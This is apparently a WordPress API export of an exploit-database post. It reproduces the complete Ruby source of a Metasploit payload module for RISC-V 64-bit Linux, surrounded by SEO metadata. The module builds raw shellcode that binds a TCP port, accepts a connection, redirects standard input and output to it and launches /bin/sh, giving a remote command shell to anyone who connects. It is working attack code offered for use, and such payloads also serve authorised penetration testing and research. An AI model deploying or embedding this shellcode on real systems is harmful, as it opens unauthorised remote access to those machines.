{"id":34012,"date":"2026-01-05T13:52:04","date_gmt":"2026-01-05T13:52:04","guid":{"rendered":"http:\/\/localhost\/?p=34012"},"modified":"2026-01-05T13:52:04","modified_gmt":"2026-01-05T13:52:04","slug":"linux-command-shell-bind-tcp-inline","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=34012","title":{"rendered":"Linux Command Shell, Bind TCP Inline_MSF:PAYLOAD-LINUX-RISCV64LE-SHELL_BIND_TCP-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-05T19:04:51&#8243;,&#8221;description&#8221;:&#8221;Listen for a connection and spawn a command shell Module Options msf use payload\/linux\/riscv64le\/shellbindtcp msf payloadshellbindtcp show actions &#8230;actions&#8230; msf payloadshellbindtcp set ACTION msf payloadshellbindtcp show options &#8230;show and set&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-05T18:59:07&#8243;,&#8221;modified&#8221;:&#8221;2026-01-05T18:59:07&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Linux Command Shell, Bind TCP Inline&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:PAYLOAD-LINUX-RISCV64LE-SHELL_BIND_TCP-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nmodule MetasploitModule\\n  CachedSize = 164\\n\\n  include Msf::Payload::Single\\n  include Msf::Payload::Linux\\n  include Msf::Sessions::CommandShellOptions\\n\\n  SYS_SOCKET = 198\\n  SYS_BIND = 200\\n  SYS_LISTEN = 201\\n  SYS_ACCEPT = 202\\n  SYS_DUP3 = 24\\n  SYS_EXECVE = 221\\n  AF_INET = 2\\n  SOCK_STREAM = 1\\n  IPPROTO_IP = 0\\n\\n  def initialize(info = {})\\n    super(\\n      merge_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Linux Command Shell, Bind TCP Inline&#8217;,\\n        &#8216;Description&#8217; =\\u003e &#8216;Listen for a connection and spawn a command shell&#8217;,\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;modexp&#8217;, # bind.s execve RISC-V 64-bit shellcode\\n          &#8216;bcoles&#8217;, # metasploit\\n        ],\\n        &#8216;License&#8217; =\\u003e BSD_LICENSE,\\n        &#8216;Platform&#8217; =\\u003e &#8216;linux&#8217;,\\n        &#8216;Arch&#8217; =\\u003e [ ARCH_RISCV64LE ],\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;URL&#8217;, &#8216;https:\/\/modexp.wordpress.com\/2022\/05\/02\/shellcode-risc-v-linux\/&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/web.archive.org\/web\/20230326161514\/https:\/\/github.com\/odzhan\/shellcode\/commit\/d3ee25a6ebcdd21a21d0e6eccc979e45c24a9a1d&#8217;],\\n        ],\\n        &#8216;Handler&#8217; =\\u003e Msf::Handler::BindTcp,\\n        &#8216;Session&#8217; =\\u003e Msf::Sessions::CommandShellUnix\\n      )\\n    )\\n  end\\n\\n  # Encode a RISC-V ADDI (Add Immediate) instruction\\n  def encode_addi(rd, rs1, imm12)\\n    opcode = 0b0010011\\n    funct3 = 0b000\\n    imm = imm12 \\u0026 0xfff\\n    (imm \\u003c\\u003c 20) | (rs1 \\u003c\\u003c 15) | (funct3 \\u003c\\u003c 12) | (rd \\u003c\\u003c 7) | opcode\\n  end\\n\\n  # Encode a RISC-V LUI (Load Upper Immediate) instruction\\n  def encode_lui(rd, imm20)\\n    0b0110111 | ((imm20 \\u0026 0xfffff) \\u003c\\u003c 12) | (rd \\u003c\\u003c 7)\\n  end\\n\\n  # Encode a RISC-V SLLI (Shift Left Logical Immediate) instruction\\n  def encode_slli(rd, rs1, shamt)\\n    opcode = 0b0010011\\n    funct3 = 0b001\\n    funct6 = 0b000000\\n    ((funct6 \\u0026 0x3f) \\u003c\\u003c 26) | ((shamt \\u0026 0x3f) \\u003c\\u003c 20) |\\n      (rs1 \\u003c\\u003c 15) | (funct3 \\u003c\\u003c 12) | (rd \\u003c\\u003c 7) | opcode\\n  end\\n\\n  # Encode a RISC-V OR instruction (rd = rs1 OR rs2).\\n  def encode_or(rd, rs1, rs2)\\n    opcode = 0b0110011\\n    funct3 = 0b110\\n    funct7 = 0b0000000\\n    (funct7 \\u003c\\u003c 25) | (rs2 \\u003c\\u003c 20) | (rs1 \\u003c\\u003c 15) | (funct3 \\u003c\\u003c 12) | (rd \\u003c\\u003c 7) | opcode\\n  end\\n\\n  # Emit RISC-V instruction words that build an arbitrary 64-bit constant in a chosen register using SLLI+LUI+ADDI\\n  # Note: modifies x6 register\\n  def load_const_into_reg64(const, rd)\\n    raise ArgumentError, \\&#8221;Constant &#8216;#{const}&#8217; is #{const.class}; not Integer\\&#8221; unless const.is_a?(Integer)\\n\\n    max_const = (1 \\u003c\\u003c 64) &#8211; 1\\n\\n    raise ArgumentError, \\&#8221;Constant #{const} is outside range 0..#{max_const}\\&#8221; unless const.between?(0, max_const)\\n\\n    # Split into 32\u2011bit halves\\n    hi = const \\u003e\\u003e 32\\n    lo = const \\u0026 0xFFFF_FFFF\\n\\n    # Load high half\\n    [\\n      *load_const_into_reg32(hi, rd),\\n      *encode_slli(rd, rd, 32),\\n      *load_const_into_reg32(lo, 6),\\n      *encode_or(rd, rd, 6),\\n    ]\\n  end\\n\\n  # Emit RISC-V instruction words that build an arbitrary 32-bit constant in a chosen register using LUI+ADDI.\\n  def load_const_into_reg32(const, rd)\\n    raise ArgumentError, \\&#8221;Constant &#8216;#{const}&#8217; is #{const.class}; not Integer\\&#8221; unless const.is_a?(Integer)\\n\\n    max_const = 0xFFFF_FFFF\\n\\n    raise ArgumentError, \\&#8221;Constant #{const} is outside range 0..#{max_const}\\&#8221; unless const.between?(0, max_const)\\n\\n    if const \\u003e= -2048 \\u0026\\u0026 const \\u003c= 2047\\n      return [encode_addi(rd, 0, const)]\\n    end\\n\\n    upper = (const + 0x800) \\u003e\\u003e 12\\n    low = const \\u0026 0xfff\\n    [\\n      encode_lui(rd, upper),\\n      encode_addi(rd, rd, low)\\n    ]\\n  end\\n\\n  def generate(_opts = {})\\n    return super unless datastore[&#8216;LPORT&#8217;]\\n\\n    lport = datastore[&#8216;LPORT&#8217;].to_i\\n    sockaddr_word = AF_INET | ([lport].pack(&#8216;n&#8217;).unpack1(&#8216;v&#8217;) \\u003c\\u003c 16)\\n\\n    shellcode = [\\n      # prepare stack\\n      0xff010113, # addi sp,sp,-16\\n\\n      # s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);\\n      *load_const_into_reg32(SYS_SOCKET, 17),       # li a7,198       # SYS_socket\\n      *load_const_into_reg32(IPPROTO_IP, 12),       # li a2,0         # IPPROTO_IP\\n      *load_const_into_reg32(SOCK_STREAM, 11),      # li a1,1         # SOCK_STREAM\\n      *load_const_into_reg32(AF_INET, 10),          # li a0,2         # AF_INET\\n      0x00000073,                                   # ecall\\n\\n      # bind(s, \\u0026sa, sizeof(sa));\\n      0x00050693,                                   # mv a3,a0        # a3 = s\\n      *load_const_into_reg32(SYS_BIND, 17),         # li a7,200       # SYS_bind\\n      *load_const_into_reg32(16, 12),               # li a2,16        # sizeof(sockaddr_in)\\n      *load_const_into_reg32(sockaddr_word, 11),    # li a1,\\u003cpacked\\u003e  # sin_family=AF_INET, sin_port=port, sin_addr=INADDR_ANY\\n      0x00b13023,                                   # sd a1,0(sp)     # store first 8 bytes (family+port+addr) at stack\\n      0x00013423,                                   # sd 0,8(sp)      # sin_zero\\n      0x00010593,                                   # mv a1,sp        # a1 = \\u0026sa\\n      0x00000073,                                   # ecall\\n\\n      # listen(s, 1);\\n      *load_const_into_reg32(SYS_LISTEN, 17),       # li a7,201       # SYS_listen\\n      0x00100593,                                   # li a1,1         # backlog = 1\\n      0x00068513,                                   # mv a0,a3        # a0 = s\\n      0x00000073,                                   # ecall\\n\\n      # r = accept(s, 0, 0);\\n      *load_const_into_reg32(SYS_ACCEPT, 17),       # li a7,202       # SYS_accept\\n      0x00000613,                                   # li a2,0         # addrlen = NULL\\n      0x00000593,                                   # li a1,0         # addr = NULL\\n      0x00068513,                                   # mv a0,a3        # a0 = s\\n      0x00000073,                                   # ecall\\n\\n      # dup stdin\/stdout\/stderr\\n      0x00050713,                                   # mv a4,a0\\n      *load_const_into_reg32(SYS_DUP3, 17),         # li a7,24        # SYS_dup3\\n      *load_const_into_reg32(3, 11),                # li a1,3         # start from STDERR_FILENO + 1 = 3\\n      # c_dup:\\n      0x00070513,                                   # mv a0,a4\\n      0xfff58593,                                   # addi a1,a1,-1\\n      0x00000073,                                   # ecall\\n      0xfe059ae3,                                   # bnez a1,100ec \\u003cc_dup\\u003e\\n\\n      # execve(\\&#8221;\/bin\/sh\\&#8221;, NULL, NULL);\\n      *load_const_into_reg32(SYS_EXECVE, 17),       # SYS_execve\\n      0x34399537,                                   # lui a0,0x34399\\n      0x7b75051b,                                   # addiw a0,a0,1975\\n      0x00c51513,                                   # slli a0,a0,0xc\\n      0x34b50513,                                   # addi a0,a0,843\\n      0x00d51513,                                   # slli a0,a0,0xd\\n      0x22f50513,                                   # addi a0,a0,559\\n      0x00a13023,                                   # sd a0,0(sp)\\n      0x00010513,                                   # mv a0,sp\\n      0x00000073                                    # ecall\\n    ].pack(&#8216;V*&#8217;)\\n\\n    # align our shellcode to 4 bytes\\n    shellcode += \\&#8221;\\\\x00\\&#8221; while shellcode.bytesize % 4 != 0\\n\\n    super.to_s + shellcode\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/payloads\/singles\/linux\/riscv64le\/shell_bind_tcp.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/payload\/linux\/riscv64le\/shell_bind_tcp\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-05T19:04:51&#8243;,&#8221;description&#8221;:&#8221;Listen for a connection and spawn a command shell Module Options msf use payload\/linux\/riscv64le\/shellbindtcp msf payloadshellbindtcp show actions &#8230;actions&#8230; msf payloadshellbindtcp set ACTION msf payloadshellbindtcp&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-34012","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Linux Command Shell, Bind TCP Inline_MSF:PAYLOAD-LINUX-RISCV64LE-SHELL_BIND_TCP- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=34012\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Linux Command Shell, Bind TCP Inline_MSF:PAYLOAD-LINUX-RISCV64LE-SHELL_BIND_TCP- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-01-05T19:04:51&#8243;,&#8221;description&#8221;:&#8221;Listen for a connection and spawn a command shell Module Options msf use payload\/linux\/riscv64le\/shellbindtcp msf payloadshellbindtcp show actions &#8230;actions&#8230; msf payloadshellbindtcp set ACTION msf payloadshellbindtcp...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=34012\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-05T13:52:04+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34012#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34012\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Linux Command Shell, Bind TCP Inline_MSF:PAYLOAD-LINUX-RISCV64LE-SHELL_BIND_TCP-\",\"datePublished\":\"2026-01-05T13:52:04+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34012\"},\"wordCount\":1214,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"metasploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=34012#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34012\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34012\",\"name\":\"Linux Command Shell, Bind TCP Inline_MSF:PAYLOAD-LINUX-RISCV64LE-SHELL_BIND_TCP- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-05T13:52:04+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34012#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=34012\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=34012#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Linux Command Shell, Bind TCP Inline_MSF:PAYLOAD-LINUX-RISCV64LE-SHELL_BIND_TCP-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Linux Command Shell, Bind TCP Inline_MSF:PAYLOAD-LINUX-RISCV64LE-SHELL_BIND_TCP- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=34012","og_locale":"en_US","og_type":"article","og_title":"Linux Command Shell, Bind TCP Inline_MSF:PAYLOAD-LINUX-RISCV64LE-SHELL_BIND_TCP- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-01-05T19:04:51&#8243;,&#8221;description&#8221;:&#8221;Listen for a connection and spawn a command shell Module Options msf use payload\/linux\/riscv64le\/shellbindtcp msf payloadshellbindtcp show actions &#8230;actions&#8230; msf payloadshellbindtcp set ACTION msf payloadshellbindtcp...","og_url":"https:\/\/zero.redgem.net\/?p=34012","og_site_name":"zero redgem","article_published_time":"2026-01-05T13:52:04+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=34012#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=34012"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Linux Command Shell, Bind TCP Inline_MSF:PAYLOAD-LINUX-RISCV64LE-SHELL_BIND_TCP-","datePublished":"2026-01-05T13:52:04+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=34012"},"wordCount":1214,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","metasploit","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=34012#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=34012","url":"https:\/\/zero.redgem.net\/?p=34012","name":"Linux Command Shell, Bind TCP Inline_MSF:PAYLOAD-LINUX-RISCV64LE-SHELL_BIND_TCP- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-05T13:52:04+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=34012#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=34012"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=34012#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Linux Command Shell, Bind TCP Inline_MSF:PAYLOAD-LINUX-RISCV64LE-SHELL_BIND_TCP-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/34012","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=34012"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/34012\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=34012"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=34012"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=34012"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}